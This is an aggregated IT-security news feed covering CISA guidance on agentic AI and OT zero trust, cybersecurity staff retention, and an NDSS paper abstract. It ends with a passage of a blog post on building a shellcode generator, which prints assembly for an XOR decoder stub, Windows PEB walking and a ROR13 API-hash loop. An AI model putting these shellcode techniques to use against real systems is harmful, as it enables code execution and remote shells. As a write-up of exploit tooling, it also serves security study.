<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With prompt injection and other attack pathways consistently surfacing across agentic AI deployments, security watchdogs have stepped in, collectively, to draw some hard boundaries.</p>



<p>A joint <a href="https://www.cyber.gov.au/business-government/secure-design/artificial-intelligence/careful-adoption-of-agentic-ai-services" target="_blank" rel="noreferrer noopener">advisory</a> from the US Cybersecurity and Infrastructure Security Agency (CISA) and international partners has called for tighter control over permissions, stronger monitoring, and a more deliberate rollout strategy, urging organizations to treat agentic AI with caution.</p>



<p>“Organizations cannot just drop agents into production and hope the guardrails hold,” said <a href="https://www.linkedin.com/in/piyushsharrma/" target="_blank" rel="noreferrer noopener">Piyush Sharma</a>, CEO and co-founder of Tuskira, agreeing with CISA’s instructions. “They need to understand what each agent can access, how it behaves, what systems trust its outputs, and which attack paths become reachable if it is manipulated.”</p>



<p>The advisory outlined design and development guidelines for organizations to follow before the implementation of AI agents. A few of these included strong authentication using <a href="https://www.csoonline.com/article/3971375/secure-by-design-is-likely-dead-at-cisa-will-the-private-sector-make-good-on-its-pledge.html">Secure by Design </a>principles, system transparency to flag deceptive indicators, least privilege across workflows, secure development principles as per DevSecOps <a href="https://dodcio.defense.gov/Portals/0/Documents/Library/DoD%20Enterprise%20DevSecOps%20Fundamentals%20v2.5.pdf">fundamentals</a>, and regular testing of incident response plans, among a host of others.</p>



<p>The advisory was co-authored by the Australian Signals Directorate’s Australian Cyber Security Centre, Canadian Centre for Cyber Security, New Zealand’s National Cyber Security Centre, and the UK’s National Cyber Security Centre.</p>



<h2 class="wp-block-heading"><a></a>Least privilege and tight boundaries</h2>



<p>One of the clearest through-lines in the advisory was the need to constrain what agentic AI can access.</p>



<p>“Privilege risks are a key concern for agentic AI, and strict adherence to the principle of least privilege is critical,” CISA said in the advisory. “Privileges assigned to agents directly determine the level of risk they can introduce. Poor management of privileges can expose organisations to privilege compromise, scope creep, identity spoofing, and agent impersonation.”</p>



<p>The agencies emphasized enforcing least-privilege principles, isolating agent capabilities, and rigorously defining what data, tools, and systems each agent can interact with.</p>



<p>This is easier said than done, especially as agents are increasingly <a href="https://www.csoonline.com/article/4163708/microsoft-patched-an-agent-only-role-that-was-not.html">wired</a> into APIs, internal systems, and external services. “Every tool, data source, memory store, and permission an agent touches becomes another possible way in for attackers,” Sharma noted.</p>



<p>To tackle this, the advisory recommends organizations maintain a clear inventory of agent capabilities and dependencies, while also validating how agents interpret and act on inputs. This includes guarding against prompt injection and ensuring that agents don’t blindly trust external content or instructions.</p>



<h2 class="wp-block-heading"><a></a>Continuous monitoring with human-in-the-loop control</h2>



<p>While the first half of the advisory focused on limiting what agents can do, the second was about watching what they actually do, reacting quickly when things go sideways.</p>



<p>“Operators should implement continuous monitoring and auditing to maintain awareness of AI agent operation and ensure traceability for decisions and actions,” CISA added. “Continuous auditing processes improve security measures and ensure alignment with governance standards (such as risk management, oversight, and usage restrictions).”</p>



<p>CISA and its international partners also recommended integrating human control and oversight into agentic AI workflows to ensure they are approved for non-sensitive, low-risk tasks. For this, the agencies suggested live monitoring during task execution, human approval for decision-making steps, and auditing upon task execution.</p>



<p>Experts agree that visibility is critical. “Security teams need continuous visibility into how agents behave, what systems they touch, and when their actions deviate from expected patterns,” said <a href="https://www.linkedin.com/in/nicholas-tausek-6ab41611/" target="_blank" rel="noreferrer noopener">Nick Tausek</a>, Lead Security Automation Architect at Swimlane. “Building human approval into high-risk workflows and automating containment is paramount for taking action when agent behavior crosses a line.”</p>



<p>Putting it all together, the advisory detailed core risk areas, from prompt injection and data exposure to tool misuse and privilege creep, urging organizations to lock down privileged access, validate inputs and outputs, monitor agent behavior, and tightly control how these systems interact with data, tools, and other services.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Just 34% of cyber pros plan to stick with their current employer]]></title>
<description><![CDATA[Declining job satisfaction means that only one in three (34%) cybersecurity professionals plan to stay with their current employer, increasing the pressure on CISOs’ talent retention strategies.



And according to a survey of 500 cybersecurity professionals by IANS and Artico Search, while salar...]]></description>
<link>https://tsecurity.de/de/3479970/it-security-nachrichten/just-34-of-cyber-pros-plan-to-stick-with-their-current-employer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3479970/it-security-nachrichten/just-34-of-cyber-pros-plan-to-stick-with-their-current-employer/</guid>
<pubDate>Fri, 01 May 2026 11:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Declining job satisfaction means that only one in three (34%) cybersecurity professionals plan to stay with their current employer, increasing the pressure on CISOs’ talent retention strategies.</p>



<p>And according to a survey of 500 cybersecurity professionals by IANS and Artico Search, while salary remains important it is not the primary driver of retention.</p>



<p>Flexible work models correlate strongly with satisfaction and retention, however. Hybrid work arrangements, particularly those that require only one to two days onsite per week, also tend to reduce the desire for talented cybersecurity staffers to jump ship, according to <a href="https://www.iansresearch.com/resources/press-releases/detail/new-ians-and-artico-search-report-finds-only-34--of-cybersecurity-professionals-plan-to-stay-in-their-current-roles">IANS’s Cybersecurity Talent Report</a>.</p>



<p>The researchers found that wage growth is more important in minimizing staff turnover than the absolute value of compensation packages.</p>



<p>“As pressure on cyber teams skyrockets, CISOs who double down on mentorship, coaching, and career development can create a sense of purpose and progression that helps their employees avoid burnout,” says Nick Kakolowski, senior research director at IANS.</p>



<p>Cybersecurity staff who feel their employer views security as a priority (73%) are more likely to stay than those working for enterprises who perceive little or no organizational backing for security, where the desire to stay with their current employer drops to just 19%.</p>



<p>“Visibility, career growth, and support from security leadership are necessary to keep high performers,” adds Steve Martano, an IANS faculty member and partner at Artico Search.</p>



<p>Cybersecurity training and certification body ISC2 estimates that the global cybersecurity workforce gap peaked at 4.8 million in 2024. Although <a href="https://www.isc2.org/insights/2025/12/isc2-publishes-2025-cybersecurity-workforce-study?queryID=74cb8318bf8331945d1f82bd5f0b3da2">budget cuts last year</a> have reduced the number of unfilled cybersecurity roles, the employment market remains tight and highly competitive. In <a href="https://us.resources.cio.com/resources/state-of-the-cio/">CIO.com’s State of the CIO survey</a>, cybersecurity tied AI for the hardest skill to fill despite notably higher demand for AI talent (42% to 38%).</p>



<h2 class="wp-block-heading">Career progression and workplace autonomy</h2>



<p>Along with flexibility, recruitment experts polled by CSO say that cybersecurity professionals consistently look for opportunities to develop their skills, to have agency over how they work, and to have their expertise taken seriously.</p>



<p>“When candidates see a defined career progression, the offer of ongoing certifications and training, direct visibility into strategy, and access to modern security stacks, that’s when your role becomes desirable,” says Archie Payne, president at recruitment agency CalTek Staffing.</p>



<p>Employers that fail to offer some form of remote, or at least hybrid work, will miss out on a sizable portion of the talent pool.</p>



<p>“We regularly see candidates decline otherwise strong offers because of rigid location requirements,” Payne says. “Again, top candidates know they are in-demand and won’t settle for a role that doesn’t support their work-life balance needs.”</p>



<h2 class="wp-block-heading">Skills development</h2>



<p>Richard Demeny, founder and CTO at Canary Wharfian, an online finance career platform, says that graduates and early professionals know they are calling the shots because even at the entry level talent is scarce.</p>



<p>“[New entrants] are prioritizing opportunity and learnings, as pay is pretty much standard across the board, except for maybe high-finance areas like hedge funds,” Demeny says.</p>



<p>“These professionals know that staying at the same employer for long will greatly limit their professional development: Often times, the best way to supercharge their knowledge, skills, and network is to simply change workplaces,” he adds, regarding rising <a href="https://www.cio.com/article/250918/9-reasons-good-employees-leave-and-how-you-can-prevent-it.html">employee turnover rates</a>.</p>



<p>David Berwick, director at Adria Solutions, argues that CISOs need to be more consistent in their attempts to <a href="https://www.cio.com/article/251060/employee-retention-10-strategies-for-retaining-top-talent.html">retain cybersecurity workers</a>.</p>



<p>“Clear progression, realistic workloads, visible support from leadership, and flexibility where it makes sense,” says Berwick. “The organizations that get those fundamentals right tend to attract and retain people far more effectively than those relying on compensation alone.”</p>



<h2 class="wp-block-heading">Avoiding burnout</h2>



<p>Oliver Legg, co-founder of cybersecurity recruiter Aspiron Search, says that <a href="https://www.csoonline.com/article/3631614/cybersecurity-is-tough-4-steps-leaders-can-take-now-to-reduce-team-burnout.html">employee burnout is a growing problem</a> for CISOs managing security teams.</p>



<p>“What we’re seeing in the market is that retention goes beyond pay and depends heavily on the environment you create, the support you show, and how you evolve alongside an increasingly complex threat landscape,” says Legg.</p>



<p>Security teams need to stay up to date with modern tooling to both defend against adversaries and keep teams engaged and effective.</p>



<p>“Cyber pros working with outdated tools or purely reactive processes are far more likely to disengage and look elsewhere,” Legg warns.</p>



<h2 class="wp-block-heading">Growth and elevation</h2>



<p>Offering cybersecurity staff learning opportunities can be a powerful driver of engagement and retention.</p>



<p>“Providing opportunities to attend or speak at industry conferences, along with support for new or refreshed certifications, helps teams stay motivated and continue developing,” Legg advises.</p>



<p>CalTek Staffing’s Payne notes that cybersecurity professionals are both “highly specialized and in high demand.” This means workers are “constantly being approached by companies eager for their talents and are well aware that their skills are in short supply,” he says.</p>



<p>Job candidates increasingly ask sharper questions about what their growth path would look like and whether they’ll have a voice in security strategy rather than focusing on compensation alone, according to Payne.</p>



<h2 class="wp-block-heading">Earning employee engagement</h2>



<p>Retention has become less about preventing dissatisfaction and more about continuously earning engagement.</p>



<p>“One of the biggest drivers of turnover we see is a disconnect between what the candidate was promised during the hiring process and what’s actually supported internally,” Payne says. “Many companies talk about security being ‘mission-critical’ but operate with chronically understaffed security teams, or don’t give the CISO budget authority.”</p>



<p>Payne concludes: “Strong candidates can spot this kind of problem very quickly, and they’ll leave just as fast.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to win — and lose — Decoder]]></title>
<description><![CDATA[This interview has been lightly edited for length and clarity.  Hello and welcome to Decoder, Nilay’s show about big ideas and other problems. This is Nick Statt, senior producer, and I’m joined by host and very occasional guest, Nilay Patel. Nilay, welcome back to your own show. Hello. I hate be...]]></description>
<link>https://tsecurity.de/de/3477820/it-nachrichten/how-to-win-and-lose-decoder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477820/it-nachrichten/how-to-win-and-lose-decoder/</guid>
<pubDate>Thu, 30 Apr 2026 16:01:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This interview has been lightly edited for length and clarity.  Hello and welcome to Decoder, Nilay’s show about big ideas and other problems. This is Nick Statt, senior producer, and I’m joined by host and very occasional guest, Nilay Patel. Nilay, welcome back to your own show. Hello. I hate being the guest. Now, you […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Dismantle implicit trust in OT networks, CISA tells critical infrastructure operators]]></title>
<description><![CDATA[The US Cybersecurity and Infrastructure Security Agency (CISA) has asked owners and operators of operational technology to stop assuming their networks are safe, and has released joint guidance to adapt zero trust principles for industrial systems that support US power, water, transportation, bui...]]></description>
<link>https://tsecurity.de/de/3477512/it-security-nachrichten/dismantle-implicit-trust-in-ot-networks-cisa-tells-critical-infrastructure-operators/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477512/it-security-nachrichten/dismantle-implicit-trust-in-ot-networks-cisa-tells-critical-infrastructure-operators/</guid>
<pubDate>Thu, 30 Apr 2026 14:23:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US Cybersecurity and Infrastructure Security Agency (CISA) has asked owners and operators of operational technology to stop assuming their networks are safe, and has released joint guidance to adapt zero trust principles for industrial systems that support US power, water, transportation, building automation, and weapons-support infrastructure.</p>



<p>OT owners should design controls on the assumption that adversaries are already inside the network, and validate every access request based on identity, context, and risk rather than network location, CISA and four partner agencies wrote in a 28-page <a href="https://www.cisa.gov/sites/default/files/2026-04/joint-guide-adapting-zero-trust-principles-to-operational-technology_508c.pdf" target="_blank" rel="noreferrer noopener">document</a> titled Adapting Zero Trust Principles to Operational Technology.</p>



<p>The guide was developed with the Department of War, the Department of Energy, the FBI, and the Department of State, with technical contributions from the National Institute of Standards and Technology.</p>



<p>The agencies were direct about the threat driving the publication.</p>



<p>“CISA has observed threat actors like Volt Typhoon targeting OT systems to compromise, escalate, and maintain access within operational environments,” CISA Acting Executive Assistant Director for Cybersecurity Chris Butera said in a <a href="https://www.cisa.gov/news-events/news/cisa-and-us-government-partners-unveil-guide-accelerate-zero-trust-adoption-operational-technology" target="_blank" rel="noreferrer noopener">statement accompanying the release</a>. “Zero Trust architecture is critical to preventing cyber incidents that could cause operators to lose visibility or control of essential systems.”</p>



<p>CISA, the FBI, and the National Security Agency <a href="https://www.csoonline.com/article/1306501/china-backed-volt-typhoon-preparing-wave-of-attacks.html">first warned</a> in February 2024 that the Chinese state-sponsored group was prepositioning on US IT networks to enable lateral movement to OT assets in the event of geopolitical conflict. The group has <a href="https://www.csoonline.com/article/3604173/volt-typhoon-returns-with-fresh-botnet-attacks-on-critical-us-infrastructure.html">since resurfaced</a> with renewed botnet activity exploiting end-of-life routers and <a href="https://www.csoonline.com/article/3497078/chinas-volt-typhoon-exploits-versa-zero-day-to-hack-us-isps-and-it-firms.html">exploited</a> a Versa Director zero-day to harvest credentials from US ISPs.</p>



<p>Pete Luban, field CISO at cybersecurity firm AttackIQ, said the convergence of IT and OT was the structural reason the guidance was needed. “Systems that were once isolated are now increasingly connected to enterprise networks and third-party services, and attackers are taking full advantage,” Luban said. “Adversaries aren’t just looking for data to steal, but for the weak seams between business and operational systems that can be used to move laterally across networks.” In OT, a successful intrusion can escalate quickly from a cybersecurity issue to an operational, safety, and public trust issue, he added.</p>



<h2 class="wp-block-heading">A reference architecture built for the plant floor</h2>



<p>It is precisely those weak seams that the new guide tries to close. The document is structured around the six functions of <a href="https://www.nist.gov/cyberframework" target="_blank" rel="noreferrer noopener">NIST Cybersecurity Framework 2.0</a> — Govern, Identify, Protect, Detect, Respond, and Recover — and aligns with CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" target="_blank" rel="noreferrer noopener">Cross-Sector Cybersecurity Performance Goals 2.0</a>, the <a href="https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v2.0(U)_Sep22.pdf" target="_blank" rel="noreferrer noopener">DoD Zero Trust Reference Architecture v2.0</a>, <a href="https://csrc.nist.gov/pubs/sp/800/82/r3/final" target="_blank" rel="noreferrer noopener">NIST SP 800-82r3</a>, and the international ISA/IEC 62443 series.</p>



<p>But the agencies wrote that none of those frameworks could be applied to OT unmodified.</p>



<p>“The blanket application of traditional information technology (IT)-focused ZT capabilities to OT is neither reasonable nor feasible,” the document stated, calling instead for continuous collaboration between OT engineers, IT architects, and cybersecurity professionals.</p>



<p>The guidance directs operators to segment Active Directory used in OT into a “separate forest or domain, avoid direct trust relationships between IT and OT identity systems, and enforce multi-factor authentication at the jump host level” where the underlying device cannot support it. Privileged sessions should be vaulted, recorded, and time-bound, with just-in-time access used to restrict remote vendor connections to narrowly defined maintenance windows, the document advised.</p>



<p>On encryption, the document distinguished confidentiality and integrity. Integrity and authentication through digital signing are typically more critical than confidentiality in OT, the agencies wrote, because expired certificates will not halt operations if communications remain in the clear. At the same time, encryption can introduce latency that disrupts safety-critical systems.</p>



<p>That kind of nuance is precisely why the model cannot be transplanted wholesale, said Nick Tausek, lead security automation architect at Swimlane. “OT teams cannot simply lift and shift an IT security model into environments where downtime, latency, and safety risks carry real-world consequences,” Tausek said. “Zero trust has to be implemented with precision, operational awareness, and automation that can enforce policy without creating more friction for the people keeping critical systems running.”</p>



<h2 class="wp-block-heading">What it means for security teams</h2>



<p>The publication closes a gap that CISA’s <a href="https://www.csoonline.com/article/575021/cisa-updates-zero-trust-maturity-model-to-provide-an-easier-launch.html">Zero Trust Maturity Model 2.0</a> acknowledged, having stated it did not address challenges specific to operational technology. It follows February’s <a href="https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication" target="_blank" rel="noreferrer noopener">Barriers to Secure OT Communications</a> and earlier CISA <a href="https://www.csoonline.com/article/3992747/critical-infrastructure-under-attack-flaws-becoming-weapon-of-choice.html">warnings</a> that exposed VPNs, firewalls, and legacy edge devices remain the dominant entry points for critical infrastructure attacks.</p>



<p>The document told buyers that strategic procurement is how operators escape the legacy trap, and pointed them to the <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" target="_blank" rel="noreferrer noopener">Secure by Demand</a> guide for contracting criteria and to its open-source SIEM tool, <a href="https://github.com/cisagov/Malcolm" target="_blank" rel="noreferrer noopener">Malcolm</a>, for OT protocol parsing.</p>



<p>Luban said the harder problem is verifying that any of these controls hold. Organizations need to test boundaries against real-world adversary tactics, he said, to identify “where trust is being assumed, where access is too broad, and where attackers may still be able to cross from enterprise environments into operational systems before those gaps are exposed in a real incident.” The tooling adopted to run those tests carries its own risk. Tausek said AI-driven security agents now sitting alongside OT environments have become high-value targets in their own right. “If an attacker can tamper with an agent, disable it, or use it as a trusted pathway, the tool meant to improve detection can become part of the problem,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NDSS 2026 - What Do They Fix? LLM-Aided Categorization of Security Patches for Critical Memory Bugs]]></title>
<description><![CDATA[Author: NDSS Symposium - Bewertung: 0x - Views:4 SESSION
Session 5B: Program Analysis & Fuzzing
Fuzz Lightyear to Infinity
NDSS Symposium 2026
23 February–27 February 2026, San Diego, California
 
PAPER
What Do They Fix? LLM-Aided Categorization of Security Patches for Critical Memory Bugs
https:...]]></description>
<link>https://tsecurity.de/de/3477382/it-security-video/ndss-2026-what-do-they-fix-llm-aided-categorization-of-security-patches-for-critical-memory-bugs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477382/it-security-video/ndss-2026-what-do-they-fix-llm-aided-categorization-of-security-patches-for-critical-memory-bugs/</guid>
<pubDate>Thu, 30 Apr 2026 13:33:04 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NDSS Symposium - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/EhoDOCfXgB0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>SESSION<br />
Session 5B: Program Analysis & Fuzzing<br />
Fuzz Lightyear to Infinity<br />
NDSS Symposium 2026<br />
23 February–27 February 2026, San Diego, California<br />
 <br />
PAPER<br />
What Do They Fix? LLM-Aided Categorization of Security Patches for Critical Memory Bugs<br />
https://www.ndss-symposium.org/ndss-paper/what-do-they-fix-llm-aided-categorization-of-security-patches-for-critical-memory-bugs/<br />
<br />
Open-source software projects are foundational to modern software ecosystems, with the Linux kernel standing out as a critical exemplar due to its ubiquity and complexity. Although security patches are continuously integrated into the Linux mainline kernel, downstream maintainers often delay their adoption, creating windows of vulnerability. A key reason for this lag is the difficulty in identifying security-critical patches, particularly those addressing exploitable vulnerabilities such as out-of-bounds (OOB) accesses and use-after-free (UAF) bugs. This challenge is exacerbated by intentionally silent bug fixes, incomplete or missing CVE assignments, delays in CVE issuance, and recent changes to the CVE assignment criteria for the Linux kernel.<br />
<br />
Prior efforts such as GraphSPD, have proposed binary classifiers to distinguish security versus non-security patches. However, these approaches do not provide fine-grained categorization of vulnerability types, which is essential for prioritizing fixes for high-impact bugs like OOB and UAF. Our work aims to take such coarsely labeled security patches and classify them into fine-grained categories, i.e., OOB, UAF, or non-OOB-UAF types.<br />
<br />
AUTHORS<br />
Xingyu Li (UC Riverside), Juefei Pu (UC Riverside), Yifan Wu (UC Riverside), Xiaochen Zou (UC Riverside), Shitong Zhu (UC Riverside), Qiushi Wu (IBM), Zheng Zhang (UC Riverside), Joshua Hsu (UC Riverside), Yue Dong (UC Riverside), Zhiyun Qian (UC Riverside), Kangjie Lu (University of Minnesota), Trent Jaeger (UC Riverside), Michael De Lucia (U.S. Army Research Laboratory), Srikanth V. Krishnamurthy (UC Riverside)<br />
 <br />
ABOUT NDSS Symposium<br />
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies. https://www.ndss-symposium.org/<br />
 <br />
#NDSSSymposium #NDSS26 #NDSS2026 #InternetSecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ShellForge: Building a Constraint-Aware Shellcode Generator from Scratch]]></title>
<description><![CDATA[How I built a multi-architecture shellcode synthesiser in C that outperforms msfvenom on bad-char avoidance — and what I learned about constraint-driven exploit development along the way.The Problem with Existing ToolsEvery penetration tester has been here. You have a buffer overflow. You have co...]]></description>
<link>https://tsecurity.de/de/3473290/hacking/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473290/hacking/shellforge-building-a-constraint-aware-shellcode-generator-from-scratch/</guid>
<pubDate>Wed, 29 Apr 2026 07:22:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>How I built a multi-architecture shellcode synthesiser in C that outperforms msfvenom on bad-char avoidance — and what I learned about constraint-driven exploit development along the way.</em></p><h3>The Problem with Existing Tools</h3><p>Every penetration tester has been here. You have a buffer overflow. You have control of EIP. You generate a payload with msfvenom or pwntools shellcraft, pipe it through your exploit, and watch it crash — because the target environment strips \x00, or \x0a, or some other byte your shellcode happens to contain.</p><p>So you add -b "\x00\x0a\x0d" to msfvenom, it wraps your payload in an encoder, and suddenly your 26-byte execve shell is 250 bytes with a Shikata Ga Nai decoder stub bolted to the front. You didn't design around the constraints — you generated something and then tried to fix it.</p><p>This is the template problem. Every major shellcode tool today works the same way: maintain a library of pre-written shellcode templates, apply encoding wrappers after the fact, hope the decoder stub itself doesn’t contain your bad chars.</p><p><strong>ShellForge takes a different approach.</strong> Instead of generating first and encoding second, it treats constraints as inputs to the synthesis process. The question isn’t “how do I encode this payload to avoid bad chars?” — it’s “what sequence of valid instructions satisfies this goal under these constraints?”</p><h3>What ShellForge Is</h3><p>ShellForge is a constraint-aware shellcode generator with four layers:</p><ul><li><strong>C99 core</strong> — a shared library (.so/.dll) that performs instruction-level synthesis for four architectures</li><li><strong>Python orchestration layer</strong> — a ctypes bridge + Flask REST API</li><li><strong>GPT-4o-mini annotation</strong> — plain-English explanation of generated shellcode</li><li><strong>Single-file HTML dashboard</strong> — no Node, no build step, runs in any browser</li></ul><p>It supports Linux and Windows targets across x86–64, x86–32, ARM Thumb, and MIPS BE. For each architecture it can synthesise four payload types: execve shell, reverse shell, bind shell, and arbitrary write.</p><p>The constraint model is the core innovation. Every synthesis request carries:</p><pre>arch          → target architecture<br>os            → target OS  <br>goal          → what the shellcode does<br>bad_chars     → forbidden bytes<br>null_free     → shorthand for banning \x00<br>newline_free  → shorthand for banning \x0a \x0d<br>size_budget   → maximum payload size in bytes<br>encoding      → NONE / XOR / ADD_SUB / AUTO</pre><p>The synthesiser selects instructions that satisfy these constraints from the start — not after.</p><h3>Architecture: Why a Shared Library?</h3><p>The C core compiles to a shared library called via Python ctypes — not a subprocess. This is a deliberate design choice.</p><p>When you call msfvenom from Python, you’re paying subprocess overhead on every call. Importing pwntools costs ~1.2 seconds in Python startup time before a single byte of shellcode is generated. ShellForge loads the library once and calls sf_synthesize() as a direct function call. The result: synthesis in <strong>under 0.1ms</strong> per payload.</p><p>The ctypes bridge mirrors every C struct exactly:</p><pre>class _Constraints(ctypes.Structure):<br>    _fields_ = [<br>        ("arch",           ctypes.c_int),<br>        ("os",             ctypes.c_int),<br>        ("goal",           ctypes.c_int),<br>        ("bad_chars",      ctypes.c_uint8 * 256),<br>        ("bad_char_count", ctypes.c_size_t),<br>        ("size_budget",    ctypes.c_size_t),<br>        ("null_free",      ctypes.c_int),<br>        ...<br>    ]</pre><p>No serialisation, no IPC, no parsing. Python hands a struct pointer directly to C memory.</p><h3>The Encoding Problem: REX-Free Decoder Stubs</h3><p>The hardest engineering problem in ShellForge wasn’t writing the shellcode — it was writing the <strong>decoder stub</strong>.</p><p>When a payload contains bad chars, ShellForge encodes it with XOR or ADD/SUB and prepends a self-decoding stub. But here’s the catch that most tools miss: <strong>the decoder stub itself can also contain bad chars.</strong></p><p>If \x48 (the x86-64 REX.W prefix) is a bad char — which it often is in real exploits — then standard XOR decoder stubs break immediately because they're full of mov rbx, rsi and inc rsi instructions, both of which use \x48.</p><p>ShellForge’s solution is a REX-free stub that avoids the REX prefix entirely:</p><pre>; Standard approach (broken when \x48 is bad):<br>mov rbx, rsi       ; 0x48 0x89 0xf3  ← \x48 = bad char!<br>inc rsi            ; 0x48 0xff 0xc6  ← \x48 again</pre><pre>; ShellForge REX-free approach:<br>push rsi           ; 0x56  ← no REX<br>pop  rbx           ; 0x5b  ← no REX (= mov rbx,rsi without REX.W)<br>inc  esi           ; 0xff 0xc6  ← 32-bit, zero-extends to rsi</pre><p>The stub is 23 bytes and contains no \x48 bytes. The encoder iterates keys 1–255, encodes the payload, patches the key and length into the stub, then verifies the <strong>entire output</strong> — stub plus encoded payload — is clean before returning.</p><pre>/* Patch stub BEFORE clean check (placeholders are 0x00) */<br>stub[XOR_LEN_OFF] = (uint8_t)olen;<br>stub[XOR_KEY_OFF] = (uint8_t)key;<br>if (!sf_buffer_clean(c, stub, XOR_STUB_LEN)) continue;</pre><p>This order matters. Checking cleanness before patching means the \x00 placeholder bytes would fail the null-free check before we've even inserted the real key.</p><h3>Windows: PEB Walking Without Hardcoded Addresses</h3><p>The Windows synthesiser uses a technique called <strong>PEB walking with ROR13 hashing</strong> — the same approach used by Metasploit’s Windows stagers.</p><p>The challenge on Windows is that you can’t call WinExec directly in position-independent shellcode. You don't know where kernel32.dll is loaded at runtime (ASLR). Instead, you find it dynamically by walking the Process Environment Block:</p><pre>mov  rax, gs:[0x60]        ; PEB pointer (always at GS:0x60 on x64)<br>mov  rax, [rax+0x18]       ; PEB_LDR_DATA<br>mov  rax, [rax+0x20]       ; InMemoryOrderModuleList.Flink<br>mov  rax, [rax]            ; skip ntdll (first entry)<br>mov  rax, [rax]            ; kernel32 (second entry)<br>mov  rbx, [rax+0x20]       ; DllBase = kernel32 base address</pre><p>Once you have the base address of kernel32.dll, you walk its export table and find WinExec using a ROR13 hash comparison — rotating each character of the function name right by 13 bits and accumulating. The pre-computed hash for WinExec is 0x98FE8A0E.</p><pre>; ROR13 hash loop<br>movzx edi, byte [rsi]     ; load character<br>test  dil, dil            ; null terminator?<br>jz    hash_done<br>ror   edx, 13             ; rotate hash right 13<br>add   edx, edi            ; accumulate character<br>inc   rsi<br>jmp   hash_loop</pre><pre>hash_done:<br>cmp   edx, 0x98FE8A0E     ; WinExec hash?<br>jne   next_name</pre><p>This was execution-verified on Windows 10 x64 — the shellcode runs, walks the PEB, resolves WinExec, and spawns cmd.exe.</p><h3>Benchmark Results</h3><p>I ran ShellForge against pwntools across 10 constraint profiles ranging from unconstrained to highly restricted bad-char sets. msfvenom results are included from manual runs (it requires Metasploit Framework).</p><pre>Profile                                    ShellForge         pwntools              Winner<br>─────────────────────────────────────────────────────────────────────────────────────────<br>x86-64 execve, no constraints              ✅ 26B  0.1ms      ✅ 48B  1877ms        SF (size + speed)<br>x86-64 execve, null-free                   ✅ 26B  0.1ms      ✅ 48B  1204ms        SF (size + speed)<br>x86-64 execve, bad chars 00,0a,0d          ✅ 26B  0.1ms      ✅ 48B  1221ms        SF (size + speed)<br>x86-64 execve, bad chars 00,0a,0d,20,2f    ✅ 49B  0.1ms      ✅ 48B  DIRTY ❌      SF (clean output) ⭐<br>x86-64 reverse shell, null-free            ✅ 120B 0.1ms      ✅ 118B 1177ms        Tie<br>x86-32 execve, null-free                   ✅ 24B  0.1ms      ✅ 44B  1126ms        SF (size + speed)<br>x86-32 execve, bad chars 00,0a,0d,ff       ✅ 24B  0.1ms      ✅ 44B  1157ms        SF (size + speed)<br>ARM    execve, bad chars 0a,0d,20          ✅ 22B  0.2ms      ✅ varies             SF (size)<br>MIPS   execve, bad chars 0a,0d,20          ✅ 60B  0.2ms      ✅ varies             SF (speed)<br>x86-64 execve, size budget 60B             ✅ 26B  0.1ms      ✅ 48B  1161ms        SF (fits budget)<br>─────────────────────────────────────────────────────────────────────────────────────────<br>Summary   ShellForge: 8/10 success  8/10 clean  avg 40B  avg 0.1ms<br>          pwntools:   8/10 success  7/10 clean  avg 56B  avg 1300ms</pre><p><strong>Summary:</strong></p><ul><li>ShellForge: 8/10 success, 8/10 clean, avg 40B, avg <strong>0.1ms</strong></li><li>pwntools: 8/10 success, <strong>7/10 clean</strong>, avg 56B, avg <strong>1300ms</strong></li></ul><p>The headline finding is <strong>P04</strong>: under bad chars \x00\x0a\x0d\x20\x2f, pwntools produces a payload that contains forbidden bytes — it doesn't verify its own output. ShellForge produces a verified-lean 49-byte XOR-encoded payload.</p><p>Speed is a secondary finding but worth noting: ShellForge is ~13,000x faster per synthesis call. For fuzzing or automated exploit development workflows where you’re generating thousands of payloads, this matters.</p><h3>Known Limitations</h3><p><strong>ARM/MIPS null-free synthesis is not currently supported.</strong> The svc #0 instruction in ARM Thumb mode is \x00\xdf — the first byte is a null. There's no alternative encoding that avoids this at the instruction level. A path forward exists using 